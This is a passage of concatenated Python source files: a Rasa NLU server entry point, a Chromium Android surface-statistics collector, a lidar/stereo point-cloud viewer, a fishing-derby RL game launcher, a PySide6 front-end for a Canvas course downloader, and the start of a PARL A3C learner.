        '-P', '--port', type=int,
        help='port on which to run server')
    arg_parser.add_argument(
        '-t', '--token',
        help="auth token. If set, reject requests which don't provide this token as a query parameter")
    arg_parser.add_argument(
        '-w', '--write',
        help='file where logs will be saved')
    return arg_parser
if __name__ == "__main__":
    # Merge configuration from (in increasing precedence) config file,
    # environment variables and command line arguments.
    parser = create_argparser()
    cmdline_args = {key: val for key, val in vars(parser.parse_args()).items() if val is not None}
    config = RasaNLUConfig(cmdline_args.get("config"), os.environ, cmdline_args)
    print(config.view())
    logging.basicConfig(filename=config.log_file, level=config.log_level)
    logging.captureWarnings(True)
    logging.debug(config.view())
    try:
        # Convert SIGTERM into KeyboardInterrupt so the shutdown path below
        # also runs when stopped by a process manager.
        def stop(signal_number, frame):
            raise KeyboardInterrupt()
        signal.signal(signal.SIGTERM, stop)

        server = RasaNLUServer(config)
        server.start()
    except KeyboardInterrupt:
        # NOTE(review): if RasaNLUServer(config) raises KeyboardInterrupt
        # before 'server' is bound, this would hit a NameError — confirm.
        server.stop()
|
surface_stats_collector.py | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import Queue
import datetime
import logging
import re
import threading
from pylib import android_commands
from pylib.device import device_utils
# Log marker containing SurfaceTexture timestamps.
_SURFACE_TEXTURE_TIMESTAMPS_MESSAGE = 'SurfaceTexture update timestamps'
# Pattern for the integer timestamp values that accompany the marker above.
_SURFACE_TEXTURE_TIMESTAMP_RE = r'\d+'
# Frame deltas below this fraction of the refresh period are discarded as
# noise (see _GetNormalizedDeltas / _CalculateResults below).
_MIN_NORMALIZED_FRAME_LENGTH = 0.5
class SurfaceStatsCollector(object):
"""Collects surface stats for a SurfaceView from the output of SurfaceFlinger.
Args:
device: A DeviceUtils instance.
"""
  class Result(object):
    """A single named metric produced by the collector."""

    def __init__(self, name, value, unit):
      # name: metric identifier (e.g. 'avg_surface_fps'); value: measured
      # number, or None when no data was collected; unit: unit string.
      self.name = name
      self.value = value
      self.unit = unit
  def __init__(self, device):
    # TODO(jbudorick) Remove once telemetry gets switched over.
    if isinstance(device, android_commands.AndroidCommands):
      device = device_utils.DeviceUtils(device)
    self._device = device
    # Background thread created by Start() when latency data is available.
    self._collector_thread = None
    # True when SurfaceFlinger latency data could not be cleared and the
    # legacy surface-stats path is used instead (see Start()).
    self._use_legacy_method = False
    self._surface_before = None
    self._get_data_event = None
    self._data_queue = None
    self._stop_event = None
    self._results = []
    self._warn_about_empty_data = True
  def DisableWarningAboutEmptyData(self):
    # Clear the flag that (per its name) gates a warning when no surface
    # stats were collected; the consumer is outside this chunk.
    self._warn_about_empty_data = False
  def Start(self):
    """Begin collecting surface statistics.

    Prefers the SurfaceFlinger latency pipeline: when clearing its data
    succeeds, a background collector thread is started; otherwise falls
    back to the legacy method and snapshots the current surface stats.
    """
    assert not self._collector_thread
    if self._ClearSurfaceFlingerLatencyData():
      self._get_data_event = threading.Event()
      self._stop_event = threading.Event()
      self._data_queue = Queue.Queue()
      self._collector_thread = threading.Thread(target=self._CollectorThread)
      self._collector_thread.start()
    else:
      self._use_legacy_method = True
      self._surface_before = self._GetSurfaceStatsLegacy()
def Stop(self):
self._StorePerfResults()
if self._collector_thread:
self._stop_event.set()
self._collector_thread.join()
self._collector_thread = None
def SampleResults(self):
self._StorePerfResults()
results = self.GetResults()
self._results = []
return results
def GetResults(self):
return self._results or self._GetEmptyResults()
@staticmethod
def _GetEmptyResults():
return [
SurfaceStatsCollector.Result('refresh_period', None, 'seconds'),
SurfaceStatsCollector.Result('jank_count', None, 'janks'),
SurfaceStatsCollector.Result('max_frame_delay', None, 'vsyncs'),
SurfaceStatsCollector.Result('frame_lengths', None, 'vsyncs'),
SurfaceStatsCollector.Result('avg_surface_fps', None, 'fps')
]
@staticmethod
def _GetNormalizedDeltas(data, refresh_period, min_normalized_delta=None):
deltas = [t2 - t1 for t1, t2 in zip(data, data[1:])]
if min_normalized_delta != None:
deltas = [d for d in deltas
if d / refresh_period >= min_normalized_delta]
return (deltas, [delta / refresh_period for delta in deltas])
@staticmethod
def _CalculateResults(refresh_period, timestamps, result_suffix):
"""Returns a list of SurfaceStatsCollector.Result."""
frame_count = len(timestamps)
seconds = timestamps[-1] - timestamps[0]
frame_lengths, normalized_frame_lengths = \
SurfaceStatsCollector._GetNormalizedDeltas(
timestamps, refresh_period, _MIN_NORMALIZED_FRAME_LENGTH)
if len(frame_lengths) < frame_count - 1:
logging.warning('Skipping frame lengths that are too short.')
frame_count = len(frame_lengths) + 1
if len(frame_lengths) == 0:
raise Exception('No valid frames lengths found.')
_, normalized_changes = \
SurfaceStatsCollector._GetNormalizedDeltas(
frame_lengths, refresh_period)
jankiness = [max(0, round(change)) for change in normalized_changes]
pause_threshold = 20
jank_count = sum(1 for change in jankiness
if change > 0 and change < pause_threshold)
return [
SurfaceStatsCollector.Result(
'avg_surface_fps' + result_suffix,
int(round((frame_count - 1) / seconds)), 'fps'),
SurfaceStatsCollector.Result(
'jank_count' + result_suffix, jank_count, 'janks'),
SurfaceStatsCollector.Result(
'max_frame_delay' + result_suffix,
round(max(normalized_frame_lengths)),
'vsyncs'),
SurfaceStatsCollector.Result(
'frame_lengths' + result_suffix, normalized_frame_lengths,
'vsyncs'),
]
@staticmethod
def _CalculateBuckets(refresh_period, timestamps):
results = []
for pct in [0.99, 0.5]:
sliced = timestamps[min(int(-pct * len(timestamps)), -3) : ]
results += SurfaceStatsCollector._CalculateResults(
refresh_period, sliced, '_' + str(int(pct * 100)))
return results
def _StorePerfResults(self):
if self._use_legacy_method:
surface_after = self._GetSurfaceStatsLegacy()
td = surface_after['timestamp'] - self._surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (surface_after['page_flip_count'] -
self._surface_before['page_flip_count'])
self._results.append(SurfaceStatsCollector.Result(
'avg_surface_fps', int(round(frame_count / seconds)), 'fps'))
return
# Non-legacy method.
assert self._collector_thread
(refresh_period, timestamps) = self._GetDataFromThread()
if not refresh_period or not len(timestamps) >= 3:
if self._warn_about_empty_data:
logging.warning('Surface stat data is empty')
return
self._results.append(SurfaceStatsCollector.Result(
'refresh_period', refresh_period, 'seconds'))
self._results += self._CalculateResults(refresh_period, timestamps, '')
self._results += self._CalculateBuckets(refresh_period, timestamps)
def _CollectorThread(self):
last_timestamp = 0
timestamps = []
retries = 0
while not self._stop_event.is_set():
self._get_data_event.wait(1)
try:
refresh_period, new_timestamps = self._GetSurfaceFlingerFrameData()
if refresh_period is None or timestamps is None:
retries += 1
if retries < 3:
continue
if last_timestamp:
# Some data has already been collected, but either the app
# was closed or there's no new data. Signal the main thread and
# wait.
self._data_queue.put((None, None))
self._stop_event.wait()
break
raise Exception('Unable to get surface flinger latency data')
timestamps += [timestamp for timestamp in new_timestamps
if timestamp > last_timestamp]
if len(timestamps):
last_timestamp = timestamps[-1]
if self._get_data_event.is_set():
self._get_data_event.clear()
self._data_queue.put((refresh_period, timestamps))
timestamps = []
except Exception as e:
# On any error, before aborting, put the exception into _data_queue to
# prevent the main thread from waiting at _data_queue.get() infinitely.
self._data_queue.put(e)
raise
def _GetDataFromThread(self):
self._get_data_event.set()
ret = self._data_queue.get()
if isinstance(ret, Exception):
raise ret
return ret
def _ClearSurfaceFlingerLatencyData(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency-clear SurfaceView')
return not len(results)
def _GetSurfaceFlingerFrameData(self):
"""Returns collected SurfaceFlinger frame timing data.
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# adb shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting data is when the frame latency crosses a refresh period
# boundary, this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps in average.
#
# We use the special "SurfaceView" window name because the statistics for
# the activity's main window are not updated when the main web content is
# composited into a SurfaceView.
results = self._device.RunShellCommand(
'dumpsys SurfaceFlinger --latency SurfaceView')
if not len(results):
return (None, None)
timestamps = []
nanoseconds_per_second = 1e9
refresh_period = long(results[0]) / nanoseconds_per_second
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# Since we only care about completed frames, we will ignore any timestamps
# with this value.
pending_fence_timestamp = (1 << 63) - 1
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = long(fields[1])
if timestamp == pending_fence_timestamp:
continue
timestamp /= nanoseconds_per_second
timestamps.append(timestamp)
return (refresh_period, timestamps)
def _GetSurfaceStatsLegacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
results = self._device.RunShellCommand('service call SurfaceFlinger 1013')
assert len(results) == 1
match = re.search(r'^Result: Parcel\((\w+)', results[0])
cur_surface = 0
if match:
try:
cur_surface = int(match.group(1), 16)
except Exception:
logging.error('Failed to parse current surface from ' + match.group(1))
else:
logging.warning('Failed to call SurfaceFlinger surface ' + results[0])
return {
'page_flip_count': cur_surface,
'timestamp': datetime.datetime.now(),
}
|
testStereoPointCloud.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import cv2
import numpy as np
import os
import Queue
import sys
import threading
from LidarTransforms import *
from VideoReader import VideoReader
from VtkRenderer import *
from GPSReader import *
from GPSTransforms import *
from ArgParser import *
from StereoCompute import *
global count
global lastTime
class LDRGrabberCallback:
    """VTK timer callback that pops fused lidar/stereo frames off a background
    queue and refreshes the point-cloud and image renderers.

    Relies on module-level globals: count, lastTime, cloud_r, image_r.
    """

    def __init__(self, queue_manager):
        # Share the manager's frame queue and start its loader loop on a
        # daemon thread so it dies with the main process.
        self.queue = queue_manager.queue
        self.manager = queue_manager
        bg_thread = threading.Thread(target=queue_manager.loadNext)
        bg_thread.daemon = True
        bg_thread.start()

    def execute(self, iren, event):
        """Timer handler: swap the previous actors for the newest frame.

        NOTE(review): queue.get() is called with no timeout, so it blocks
        until data arrives and Queue.Empty can never actually be raised here
        — confirm whether get(False)/get(timeout=...) was intended.
        """
        try:
            frame_cloud = self.queue.get()
            lidar_pts = frame_cloud['lidar_pts']
            img = frame_cloud['img']
            stereo_pts = frame_cloud['stereo_pts']
            global count
            count += 1
            # Lidar cloud colored by intensity (column 3); stereo cloud drawn
            # with a constant scalar (10 + 0*x).
            self.lidarPointCloud = VtkPointCloud(lidar_pts[:, 0:3], lidar_pts[:, 3])
            self.stereoPointCloud = VtkPointCloud(stereo_pts[:,0:3], 10+ 0*stereo_pts[:,0])
            self.vtkImage = VtkImage(img)
            # From the 3rd frame on, drop the actors added last time so the
            # renderers hold exactly one frame's worth of geometry.
            if count > 2:
                cloud_r.RemoveActor(self.lidar_actor)
                cloud_r.RemoveActor(self.stereo_actor)
                image_r.RemoveActor(self.image_actor)
            self.lidar_actor = self.lidarPointCloud.get_vtk_cloud(zMin=0, zMax=255)
            self.stereo_actor = self.stereoPointCloud.get_vtk_cloud(zMin=-10, zMax=10)
            self.image_actor = self.vtkImage.get_vtk_image()
            cloud_r.AddActor(self.lidar_actor)
            cloud_r.AddActor(self.stereo_actor)
            image_r.AddActor(self.image_actor)
            # Initially set the camera frame
            if count == 2:
                cloud_r.ResetCamera()
                image_r.ResetCamera()
                image_r.GetActiveCamera().Zoom(1.25)
            iren.GetRenderWindow().Render()
            #cv2.imshow('display', img)
            #cv2.waitKey(1)
            global lastTime
            #print time.time() - lastTime
            # NOTE(review): `time` is not imported directly in this file;
            # presumably it arrives via one of the wildcard imports — verify.
            lastTime = time.time()
        except Queue.Empty:
            if self.manager.finished == True:
                return
class FrameCloudManager:
    """Producer that reads stereo video frames, loads precomputed 3D points,
    transforms them into the lidar frame, and queues them for rendering.

    Python 2 module (uses `print` statements).
    """

    def __init__(self, args):
        self.args = args
        self.params = args['params']
        # Left/right camera streams of the same capture session.
        self.reader_left = VideoReader(args['video'])
        self.reader_right = VideoReader(args['opposite_video'])
        # Maps video frame numbers to lidar .ldr files.
        self.ldr_map = loadLDRCamMap(args['map'])
        self.queue = Queue.Queue()
        self.finished = False

    def loadNext(self):
        """Background loop: process every 5th frame pair until EOF.

        NOTE(review): indentation reconstructed — the inner for-loop is read
        as a frame-skipping device (advance 5 frames, then process the last
        pair); confirm against the original file.
        """
        while self.finished == False:
            # Skip ahead: read 5 frame pairs, keeping only the last.
            for t in range(5):
                (success, imgL) = self.reader_left.getNextFrame()
                (success, imgR) = self.reader_right.getNextFrame()
                if success == False:
                    self.finished = True
                    return
            #(disp, Q, R1, R2) = doStereo(imgL, imgR, self.params)
            #cv2.imshow('disp', disp)
            #print Q
            #stereo_points = get3dPoints(disp,Q)
            #stereo_points = stereo_points[disp > 5, :]
            (R1, R2, P1, P2, Q, size1, size2, map1x, map1y, map2x, map2y) = computeStereoRectify(self.params)
            # Precomputed 3D points for this frame, stored as .npz next to
            # the directory given on the command line.
            stereo_points = np.load(sys.argv[3] + '/3d_' + str(self.reader_left.framenum) + '.npz')['data']
            print stereo_points
            stereo_points = stereo_points.transpose()
            # Undo the rectifying rotation, then move through the camera
            # extrinsics into the lidar frame.
            stereo_points = np.dot(R1.transpose(), stereo_points)
            print np.amax(stereo_points, axis=1)
            print np.amin(stereo_points, axis=1)
            stereo_points = np.vstack((stereo_points,
                np.ones((1,stereo_points.shape[1]))))
            print stereo_points.shape
            stereo_points = dot(np.linalg.inv(self.params['cam'][0]['E']), stereo_points)
            stereo_wrt_lidar = np.dot(R_to_c_from_l(self.params['cam'][0]).transpose(), stereo_points[0:3,:])
            stereo_wrt_lidar = stereo_wrt_lidar.transpose()
            stereo_wrt_lidar = stereo_wrt_lidar[:,0:3] - self.params['cam'][0]['displacement_from_l_to_c_in_lidar_frame']
            #img = cv2.resize(img, (640, 480))
            imgL = cv2.pyrDown(imgL)
            #cv2.imshow('disparity', cv2.pyrDown(disp)/64.0)
            framenum = self.reader_left.framenum
            if framenum >= len(self.ldr_map):
                self.finished = True
                return
            ldr_file = self.ldr_map[framenum]
            lidar_pts = loadLDR(ldr_file)
            self.queue.put({'img': imgL, 'lidar_pts': lidar_pts,
                'stereo_pts': stereo_wrt_lidar})
            """
            while self.queue.qsize() > 5:
                time.sleep(0.1)
            """
def Keypress(obj, event):
    """VTK key-press observer: print the symbolic name of the pressed key.

    Args:
        obj: the interactor that fired the event (provides GetKeySym()).
        event: the VTK event name (unused).
    """
    key = obj.GetKeySym()
    # Parenthesized so the statement is valid under both Python 2 and 3
    # (in Python 2, print(key) prints the single expression identically).
    print(key)
if __name__ == '__main__':
    # Entry point: build the VTK two-viewport viewer (left: point clouds,
    # right: camera image) and stream frames via LDRGrabberCallback.
    args = parse_args(sys.argv[1], sys.argv[2])
    # Camera number is encoded in the video filename (5th char from the end);
    # only camera 1 is supported here.
    cam_num = int(sys.argv[2][-5])
    params = args['params']
    assert(cam_num == 1)
    frame_cloud_manager = FrameCloudManager(args)
    # Globals shared with LDRGrabberCallback.execute.
    global count
    count = 1
    global lastTime
    lastTime = 0
    # Left half of the window: lidar + stereo point clouds.
    cloud_r = vtk.vtkRenderer()
    cloud_r.SetBackground(0., 0., 0.)
    cloud_r.SetViewport(0,0,0.5,1.0)
    # Right half: the camera image (non-interactive).
    image_r = vtk.vtkRenderer()
    image_r.SetBackground(0., 0., 0.)
    image_r.SetViewport(0.5,0,1.0,1.0)
    image_r.SetInteractive(False)
    axes = vtk.vtkAxesActor()
    axes.AxisLabelsOff()
    cloud_r.AddActor(axes)
    # Render Window
    renderWindow = vtk.vtkRenderWindow()
    renderWindow.AddRenderer(cloud_r)
    renderWindow.AddRenderer(image_r)
    renderWindow.SetSize(1200, 600)
    # Interactor
    renderWindowInteractor = vtk.vtkRenderWindowInteractor()
    renderWindowInteractor.SetRenderWindow(renderWindow)
    mouseInteractor = vtk.vtkInteractorStyleTrackballCamera()
    renderWindowInteractor.SetInteractorStyle(mouseInteractor)
    renderWindow.Render()
    # Drive frame updates from a 1 ms repeating timer.
    cb = LDRGrabberCallback(frame_cloud_manager)
    renderWindowInteractor.AddObserver('TimerEvent', cb.execute)
    renderWindowInteractor.AddObserver('KeyPressEvent', Keypress)
    timerId = renderWindowInteractor.CreateRepeatingTimer(1)
    renderWindowInteractor.Start()
|
main.py | import argparse
import multiprocessing as mp
import sys
import yaml
from kivy import Config
from shared import SettingLoader
class Settings:
    """Configuration container for the fishing-derby game and RL agent.

    Attributes are declared with defaults in __init__ and overwritten by
    load_from_dict() from a YAML-derived dictionary.
    """

    def __init__(self):
        # Player mode, either 'human' or 'ai_rl'
        self.player_type = None
        # Frame rate of the game in seconds per frame
        self.frames_per_second = None
        # Window size is immutable and equal to self.window_scale * (800, 600)
        self.window_scale = None
        # Duration of the game in seconds
        self.game_time = None
        # Initial position of diver
        self.init_pos_diver = None
        # Jellyfishes x position
        self.jelly_x = None
        # Jellyfishes y position
        self.jelly_y = None
        # Rewards for bumping [golden_fish, jellyfish, step]
        self.rewards = None
        # Position of the king fish
        self.pos_king = None
        # Stochasticity
        self.randomness = None
        # Episode length
        self.episode_len = None
        # Max Episodes
        self.episode_max = None
        # Visualize exploration
        self.visualize_exploration = None
        # Headless
        self.headless = None
        # Seed
        self.seed = None
        # Learning rate
        self.alpha = 0
        # Discount rate (kept in sync with `gamma` by load_from_dict)
        self.discount = 0
        # epsilon initial
        self.epsilon_initial = 1
        # epsilon final
        self.epsilon_final = 1
        # annealing timesteps
        self.annealing_timesteps = 10000
        # threshold
        self.threshold = 1e-6

    def load_from_dict(self, dictionary):
        """
        Load parameters into settings object from dictionary.
        :param dictionary: mapping of option name -> value (e.g. parsed YAML)
        :return:
        """
        self.player_type = dictionary.get("player_type")
        self.frames_per_second = dictionary.get("frames_per_second", 20)
        self.init_pos_diver = dictionary.get('init_pos_diver', [1, 19])
        self.jelly_x = dictionary.get("jelly_x", [2, 2, 2, 2, 2])
        self.jelly_y = dictionary.get("jelly_y", [2, 2, 2, 2, 2])
        self.rewards = dictionary.get("rewards", [1, -1, -1, -1, -1])
        self.pos_king = dictionary.get("pos_king", [0.5, 0.5])
        self.window_scale = dictionary.get("window_scale", 1.0)
        # Note: the YAML key is "time", not "game_time".
        self.game_time = dictionary.get("time", 120)
        self.randomness = dictionary.get("stoch", True)
        self.episode_len = dictionary.get("episode_len", 100)
        self.episode_max = dictionary.get("episode_max", 1000)
        self.visualize_exploration = dictionary.get("visualize_exploration",
                                                    False)
        self.headless = dictionary.get("headless")
        self.seed = dictionary.get("seed", None)
        self.alpha = dictionary.get("alpha", 0)
        # BUG FIX: only `self.gamma` used to be assigned here, leaving the
        # `self.discount` attribute declared in __init__ stale at 0. Keep
        # both names in sync (gamma stays available for existing callers).
        self.gamma = dictionary.get("gamma", 0)
        self.discount = self.gamma
        # YAML may deliver the threshold as a string like "1e-6".
        self.threshold = float(dictionary.get("threshold", 1e-6))
        self.epsilon_final = dictionary.get("epsilon_final", 1)
        self.epsilon_initial = dictionary.get("epsilon_initial", 0.2)
        self.annealing_timesteps = dictionary.get("annealing_timesteps", 10000)
class Application(SettingLoader):
    """Wires up the game process and the player process and connects them
    through multiprocessing pipes."""

    def __init__(self):
        SettingLoader.__init__(self)
        # Declaration of class objects
        self.game_controller = None
        self.player_controller = None
        self.settings = None
        self.game_pipe_send = None
        self.game_pipe_receive = None
        self.player_pipe_receive = None
        self.player_pipe_send = None
        self.player_loop = None

    def start(self):
        """
        Start game and player processes
        :return:
        """
        # Initialize game process
        self.game_controller = self.get_app(self.settings.headless)
        self.game_controller.load_settings(self.settings)
        self.game_controller.set_receive_send_pipes(self.game_pipe_receive,
                                                    self.game_pipe_send)
        if self.settings.seed is not None:
            self.game_controller.set_seed(self.settings.seed)  # 507 episodes
        # Initialize player process
        self.player_controller = self.get_player_controller()
        self.player_controller.load_settings(self.settings)
        self.player_controller.set_receive_send_pipes(self.player_pipe_receive,
                                                      self.player_pipe_send)
        # Set player loop to use
        self.select_and_launch_player_loop()
        self.start_game()

    def select_and_launch_player_loop(self):
        """Spawn the player loop in its own process."""
        # Create process
        self.player_loop = mp.Process(
            target=self.player_controller.player_loop)
        # Start process
        self.player_loop.start()

    @staticmethod
    def get_app(headless=True):
        """Build the game app controller (import deferred to avoid pulling
        in Kivy before configuration is done)."""
        # from app import FishingDerbyRLApp
        from app_manager import FishingDerbyRLApp
        a = FishingDerbyRLApp(headless=headless)
        return a

    def get_player_controller(self):
        """Select the player controller implementation based on
        settings.player_type ('human', 'ai_rl' or 'random')."""
        if self.settings.player_type == "human":
            from player import PlayerControllerHuman
            pc = PlayerControllerHuman()
        elif self.settings.player_type == "ai_rl":
            # from player import PlayerControllerRL
            from player import PlayerControllerRL
            pc = PlayerControllerRL()
        elif self.settings.player_type == "random":
            from player import PlayerControllerRandom
            pc = PlayerControllerRandom()
        else:
            raise NotImplementedError
        return pc

    def start_game(self):
        """
        Starting the game and the parallel processes: player and game.
        :return:
        """
        self.game_controller.set_player_loop_pid(self.player_loop.pid)
        # Start graphical interface
        self.game_controller.run_headless()
        # self.game_controller.run()
        # After closing window wait until the player loop finishes
        self.player_loop.join()
        sys.exit(0)

    def create_pipes(self):
        """
        Create pipes to allow exchange of data between player and game processes
        :return:
        """
        self.game_pipe_send, self.player_pipe_receive = mp.Pipe()
        self.player_pipe_send, self.game_pipe_receive = mp.Pipe()
if __name__ == '__main__':
    # Entry point: parse CLI, load YAML settings, configure the Kivy window
    # (unless headless) and launch the game/player processes.
    # Arguments parsing
    arg_parser = argparse.ArgumentParser(
        description="Run the fishing derby KTH app")
    arg_parser.add_argument("config_file", type=str, help="Configuration file")
    args = arg_parser.parse_args()
    # Load the settings from the yaml file
    settings = Settings()
    settings_dictionary = yaml.safe_load(open(args.config_file, 'r'))
    settings.load_from_dict(settings_dictionary)
    # Set window dimensions: fixed size = window_scale * (800, 600).
    if not settings.headless:
        Config.set('graphics', 'resizable', False)
        Config.set('graphics', 'width', str(int(settings.window_scale * 800)))
        Config.set('graphics', 'height', str(int(settings.window_scale * 600)))
    # Start application
    app = Application()
    app.load_settings(settings)
    app.create_pipes()
    app.start()
|
main.py | from PySide6.QtGui import QGuiApplication
from PySide6.QtCore import QStringListModel, Qt, QUrl
from PySide6.QtQuick import QQuickView
from PySide6.QtQml import QQmlApplicationEngine
import sys
import os
import canvas_grab
import threading
from .sync_model import SyncModel
from colorama import init
from termcolor import colored
from time import sleep
from canvasapi.exceptions import ResourceDoesNotExist
class Main:
    """Qt/QML front-end for canvas_grab: runs the course sync in a background
    thread and reports progress to the UI through SyncModel signals."""

    def __init__(self):
        self._model = SyncModel()

    def _canvas_grab_run(self):
        """Background worker: log in, enumerate courses, and sync each one.

        Emits progress/status signals on self._model; UI strings are Chinese.
        """
        config = self._config
        canvas = config.endpoint.login()
        user = canvas.get_current_user()
        self._model.on_update_login_user.emit(str(user))
        courses = list(canvas.get_courses())
        # Partition into accessible courses, then apply the user's filter.
        available_courses, not_available = canvas_grab.utils.filter_available_courses(
            courses)
        filtered_courses = config.course_filter.get_filter().filter_course(
            available_courses)
        total_course_count = len(courses)
        not_available_count = len(not_available)
        filtered_count = len(available_courses) - len(filtered_courses)
        self._model.on_done_fetching_courses.emit(
            f'您已经以 {user} 身份登录。共有 {total_course_count} 门课程需同步,其中 {not_available_count} 门无法访问,{filtered_count} 门已被过滤。')
        course_name_parser = canvas_grab.course_parser.CourseParser()
        for idx, course in enumerate(filtered_courses):
            course_name = course.name
            self._model.on_new_course_in_progress.emit(
                f'({idx+1}/{len(filtered_courses)}) {course_name} (ID: {course.id})')
            # take on-disk snapshot
            parsed_name = course_name_parser.get_parsed_name(course)
            print(f' Download to {colored(parsed_name, "cyan")}')
            on_disk_path = f'{config.download_folder}/{parsed_name}'
            on_disk_snapshot = canvas_grab.snapshot.OnDiskSnapshot(
                on_disk_path).take_snapshot()
            # take canvas snapshot; on failure fall through to the next
            # snapshot mode, otherwise stop after the first success.
            mode, canvas_snapshots = config.organize_mode.get_snapshots(course)
            canvas_snapshot = {}
            for canvas_snapshot_obj in canvas_snapshots:
                try:
                    for progress_item in canvas_snapshot_obj.yield_take_snapshot():
                        (progress, status_text, progress_text) = progress_item
                        self._model.on_snapshot_in_progress.emit(
                            progress, status_text, progress_text)
                    canvas_snapshot = canvas_snapshot_obj.get_snapshot()
                except ResourceDoesNotExist:
                    print(
                        colored(f'{mode} not supported, falling back to alternative mode', 'yellow'))
                    continue
                break
            # generate transfer plan
            planner = canvas_grab.planner.Planner(
                config.organize_mode.delete_file)
            plans = planner.plan(
                canvas_snapshot, on_disk_snapshot, config.file_filter)
            print(colored(
                f' Updating {len(plans)} objects '))
            # start download
            transfer = canvas_grab.transfer.Transfer()
            transfer_task = transfer.yield_transfer(
                on_disk_path, f'{config.download_folder}/_canvas_grab_archive', plans)
            for progress_item in transfer_task:
                (progress, status_text, progress_text) = progress_item
                self._model.on_download_in_progress.emit(
                    progress, status_text, progress_text)
            self._model.on_finish_course.emit(
                f'{course_name} (ID: {course.id})',
                f'更新了 {len(plans)} 个文件。(远程 {len(canvas_snapshot)} -> 本地 {len(on_disk_snapshot)})')
        if not self._noupdate:
            canvas_grab.version.check_latest_version()

    def _exit_handler(self):
        # Hard-exit so the non-daemon sync thread cannot keep the process
        # alive after the Qt window closes.
        os._exit(0)

    def main(self):
        """Entry point: load config, start the QML UI, and kick off the
        sync thread; blocks in the Qt event loop until exit."""
        init()
        # Welcome users, and load configurations.
        try:
            _, self._noupdate, self._config = canvas_grab.get_options.get_options()
        except TypeError:
            # User canceled the configuration process
            return
        app = QGuiApplication(sys.argv)
        app.setQuitOnLastWindowClosed(True)
        app.aboutToQuit.connect(self._exit_handler)
        engine = QQmlApplicationEngine()
        engine.rootContext().setContextProperty('py_sync_model', self._model)
        engine.load(os.path.join(os.path.dirname(__file__), "ui/main.qml"))
        if not engine.rootObjects():
            sys.exit(-1)
        thread = threading.Thread(target=self._canvas_grab_run)
        thread.start()
        sys.exit(app.exec_())
# Script entry point: construct the controller and run the Qt UI.
if __name__ == "__main__":
    Main().main()
|
train.py | import os
import queue
import threading
import time
from collections import defaultdict
import numpy as np
import parl
import retro
from parl.utils import logger, summary, machine_info, get_gpu_count
from parl.utils.time_stat import TimeStat
from parl.utils.window_stat import WindowStat
import retro_util
from actor import Actor
from agent import Agent
from config import config
from model import Model
class Learner(object):
    """A3C learner: owns the trained model, spawns remote actors on a PARL
    cluster, aggregates their samples, and performs the gradient updates."""

    def __init__(self, config):
        self.config = config
        # The env is created here solely to obtain the action-space dimension.
        env = retro_util.RetroEnv(game=config['env_name'],
                                  use_restricted_actions=retro.Actions.DISCRETE,
                                  resize_shape=config['obs_shape'],
                                  render_preprocess=False)
        obs_dim = env.observation_space.shape
        action_dim = env.action_space.n
        self.config['action_dim'] = action_dim
        # This model is the one actually being trained.
        model = Model(action_dim)
        algorithm = parl.algorithms.A3C(model, vf_loss_coeff=config['vf_loss_coeff'])
        self.agent = Agent(algorithm, config, obs_dim)
        # Only a single GPU is supported.
        if machine_info.is_gpu_available():
            assert get_gpu_count() == 1, 'Only support training in single GPU,\
                    Please set environment variable: `export CUDA_VISIBLE_DEVICES=[GPU_ID_TO_USE]` .'
        # Optionally restore a pretrained model.
        if self.config['restore_model']:
            logger.info("加载预训练模型...")
            self.agent.restore(self.config['model_path'])
        # Rolling statistics for training logs (window of 100).
        self.total_loss_stat = WindowStat(100)
        self.pi_loss_stat = WindowStat(100)
        self.vf_loss_stat = WindowStat(100)
        self.entropy_stat = WindowStat(100)
        self.lr = None
        self.entropy_coeff = None
        self.best_loss = None
        self.learn_time_stat = TimeStat(100)
        self.start_time = None
        # ========== Remote Actor ===========
        self.remote_count = 0
        self.sample_data_queue = queue.Queue()
        self.remote_metrics_queue = queue.Queue()
        self.sample_total_steps = 0
        self.params_queues = []
        self.create_actors()

    # Create the configured number of actors and dispatch them to the cluster.
    def create_actors(self):
        # Connect to the cluster.
        parl.connect(self.config['master_address'])
        logger.info('Waiting for {} remote actors to connect.'.format(self.config['actor_num']))
        # Spawn one daemon thread per remote actor.
        for i in range(self.config['actor_num']):
            # Queue used to push updated parameters to this actor.
            params_queue = queue.Queue()
            self.params_queues.append(params_queue)
            self.remote_count += 1
            logger.info('Remote actor count: {}'.format(self.remote_count))
            # Thread that drives this remote actor.
            remote_thread = threading.Thread(target=self.run_remote_sample, args=(params_queue,))
            remote_thread.setDaemon(True)
            remote_thread.start()
        logger.info('All remote actors are ready, begin to learn.')
        self.start_time = time.time()

    # Create an actor and loop forever: sync its weights, then collect a
    # batch of game data from it.
    def run_remote_sample(self, params_queue):
        # Create the remote actor.
        remote_actor = Actor(self.config)
        while True:
            # Get the latest model parameters from the learner.
            latest_params = params_queue.get()
            # Push them into the actor's model.
            remote_actor.set_weights(latest_params)
